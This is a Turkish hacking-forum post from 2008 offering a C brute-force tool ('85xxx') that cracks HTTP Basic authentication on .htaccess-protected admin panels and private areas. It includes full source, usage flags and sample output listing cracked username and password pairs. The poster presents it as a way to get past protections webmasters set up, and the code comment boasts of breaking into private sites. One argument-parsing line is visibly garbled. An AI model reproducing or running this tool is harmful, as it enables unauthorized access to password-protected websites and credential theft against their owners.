Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
AnasayfaAnasayfa  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

 :: Exploitler
 

 Htaccess Şifre Kırıcı

Aşağa gitmek 
YazarMesaj
hacked
MASTER
MASTER
hacked


Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08

Htaccess Şifre Kırıcı Empty
MesajKonu: Htaccess Şifre Kırıcı   Htaccess Şifre Kırıcı EmptySalı Mart 11, 2008 12:14 am
Evet son zamanlarda bir çok zeki webmaster admin panellerine vs.. htaccess le şifre koyuyor doğal olarak buralara erişemiyoruz birazdan vericeğim exploit brute force yöntemiyle bu engeli aşmak için çalışıyor exploiti cygwin veya blind shell sayesinde herhengi bir serverda derleyebilirsiniz exploit kodları

kod:::

/*
\ 85xxx v1.0 by xCrZx ///////////////////////////////////////////23.01.04/
/
\ [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
/ []
\ Description: Program allows you to break htaccess using brute force []
/ mode. This is very convenient to breake into porno sites []
\ or some other private area such as board, etc. []
/ []
\ [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
*/

/*
\ example of work:
/
\ -bash-2.05b$ ./85xxx -h chat.eprst.ru -po 80 -pa /enter.php3 -u luser -p lpass -s
/ TARGET: chat.eprst.ru:80/enter.php3
\ 200 OK FOUND -> http://pisyun:qwerty@chat.eprst.ru:80/enter.php3
/ [pisyun]
\ 200 OK FOUND -> http://pisyaisyun@chat.eprst.ru:80/enter.php3
/ [pisya]
\ [qwerty]
/ [monster]
\ [sosok]
/ [siska]
\ [porno]
/ -bash-2.05b$
\
*/


#include <sys/param.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

#define lfn "./.logfile"

int port;
int v=0;
int s=0;
int own=0;
char *victim;
char *page;
char *own404;

char fmt[] =


"GET %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Authorization: Basic %s\r\n\r\n"



;


static char table64[]=
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/";

void errmsg(char *str) {

printf(str);
fflush(stdout);

exit(-1);

}

long getip() {
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(victim)) < 0) {
if ((he = gethostbyname(victim)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

void base64Encode(char *intext, char *output)
{
unsigned char ibuf[3];
unsigned char obuf[4];
int i;
int inputparts;

while(*intext) {
for (i = inputparts = 0; i < 3; i++) {
if(*intext) {
inputparts++;
ibuf[i] = *intext;
intext++;
}
else
ibuf[i] = 0;
}

obuf [0] = (ibuf [0] & 0xFC) >> 2;
obuf [1] = ((ibuf [0] & 0x03) << 4) | ((ibuf [1] & 0xF0) >> 4);
obuf [2] = ((ibuf [1] & 0x0F) << 2) | ((ibuf [2] & 0xC0) >> 6);
obuf [3] = ibuf [2] & 0x3F;

switch(inputparts) {
case 1: /* only one byte read */
sprintf(output, "%c%c==",
table64[obuf[0]],
table64[obuf[1]]);
break;
case 2: /* two bytes read */
sprintf(output, "%c%c%c=",
table64[obuf[0]],
table64[obuf[1]],
table64[obuf[2]]);
break;
default:
sprintf(output, "%c%c%c%c",
table64[obuf[0]],
table64[obuf[1]],
table64[obuf[2]],
table64[obuf[3]] );
break;
}
output += 4;
}
*output=0;
}


long fz(char *fn) {

FILE *fd;
long sz;
fd=fopen(fn,"r");
fseek(fd,0,SEEK_END);
sz=ftell(fd);
fclose(fd);

return sz;
}

void getown404(char *fn) {

int fd;
char c;
int i=0;

if( (fd=open(fn,O_RDONLY)) < 0) errmsg("Can't open -404 filename!\n");

own404=(char *)malloc(fz(fn));

while(read(fd,&c,sizeof c)) {
if(c!='\n' && c!='\r') own404[i++]=c;
}

if(v) printf("own404 = '%s'\n",own404);

}

void check(char *u, char *p) {
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[10000];
int sock;
int num;
fd_set rset;
int port=80,shellport=17476;
char c[2000];
char rez[2000];

sprintf(c,"%s:%s",u,p);

base64Encode(c,rez);

sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip();
sockstruct.sin_port=htons(port);

if(v) printf("\n[!] Connecting to %s:%d\n",victim,port);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

if(v) printf("Connected!\n");

fcntl(sock,F_SETFL,O_NONBLOCK);

sprintf(tmp,fmt,page,victim,rez);
write(sock,tmp,strlen(tmp));
fcntl(sock,F_SETFL,O_NONBLOCK);

bzero(tmp,sizeof(tmp));

while(strlen(tmp)==0){bzero(tmp,sizeof(tmp));read( sock,tmp,sizeof(tmp));}

if(v) printf("recieved data='%s'\n",tmp);

if(own) if(strstr(tmp,own404)!=NULL) {
if(v) printf("own404 page has been detected!\n");
close(sock);return;
}

if(strstr(tmp,"200 OK")!=NULL) {
if(s || v) printf("200 OK FOUND -> http://%s:%s@%s:%d%s\n",u,p,victim,port,page);
sprintf(tmp,"echo \"FOUND [ %s:%s ]\" >> %s",u,p,lfn);system(tmp);
}
} else errmsg("Can't connect to server!\n");

close(sock);
}

int main(int argc, char **argv) {

int fd,fd2;
char pass[1000];
char user[1000];
char bazic[2000];
char userpass[2000];
int l=0;
int i=0,j=0;

char *ul,*pl;
char ppp[200];
char c;

if(argc==1) {
printf( "\n85xxx v1.0 by xCrZx /23.01.04/\n\nusage: %s -h <host> -po <port> -pa <page> -u <userlist> -p <passlist> [-l] [-s] [-v] [-404 filename]\n-------------------\n"
"-l - login:login attack\n"
"-s - shows the result of the program execution\n"
"-v - verbose mode\n"
"-404 filename - allows you to add your own rule to make it possible to destinct valid and invalid page result (for example: when your account is invalid but server shows some 200 OK page with words \"login or password is invalid\". In this case you should make file with string that you want to filter..for example, \"invalid\")\n\n"
"P.S. result of the program goes in ./.logfile, so u can run it on background without showing result and after work check that file.\n\n"


,argv[0]);

exit(0);}


port=80;

for(i=0;i<argc;i++) {
if(strcmp(argv[i],"-u")==NULL) {ul=argv[i+1];}
if(strcmp(argv[i],"-p")==NULL) {pl=argv[i+1];}
if(strcmp(argv[i],"-h")==NULL) {victim=argv[i+1];}
if(strcmp(argv[i],"-po")==NULL) {port=atoi(argv[i+1]);}
if(strcmp(argv[i],"-p**uot==NULL) {page=argv[i+1];}
if(strcmp(argv[i],"-l")==NULL) {l=1;}
if(strcmp(argv[i],"-s")==NULL) {s=1;}
if(strcmp(argv[i],"-v")==NULL) {v=1;}
if(strcmp(argv[i],"-404")==NULL) {own=1;own404=argv[i+1];}
}


if(own) getown404(own404);

if(s || v) printf("TARGET: %s:%d%s\n",victim,port,page);

if( (fd=open(ul,O_RDONLY)) < 0 ) errmsg("Can't open userlist!\n");

memset(user,0x00,sizeof user);
i=0;

sprintf(user,"echo>%s",lfn);
system(user);
bzero(user,sizeof user);

while(read(fd,&c,sizeof c)) {
if(c!='\n' && c!='\r') user[i++]=c;
else {

if(!l) {

j=0;
bzero(pass,sizeof pass);
if( (fd2=open(pl,O_RDONLY)) < 0) errmsg("Can't open passlist!\n");
while(read(fd2,&c,sizeof c)) {
if(c!='\n' && c!='\r') pass[j++]=c;
else {
if(strlen(pass)!=0) {
if(v) printf("user=%s pass=%s\n",user,pass);
check(user,pass);
j=0; bzero(pass,sizeof pass);
}}
}

}
else { strcpy(pass,user); check(user,pass);}
if(s || v) printf("[%s]\n",user);
sprintf(ppp,"echo \"[%s]\" >> %s",user,lfn);
system(ppp);

i=0; bzero(user,sizeof user);
}
}

close(fd);close(fd2);

free(own404);

return 0;
}
Sayfa başına dön Aşağa gitmek
 
Htaccess Şifre Kırıcı
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: Exploitler-
Buraya geçin: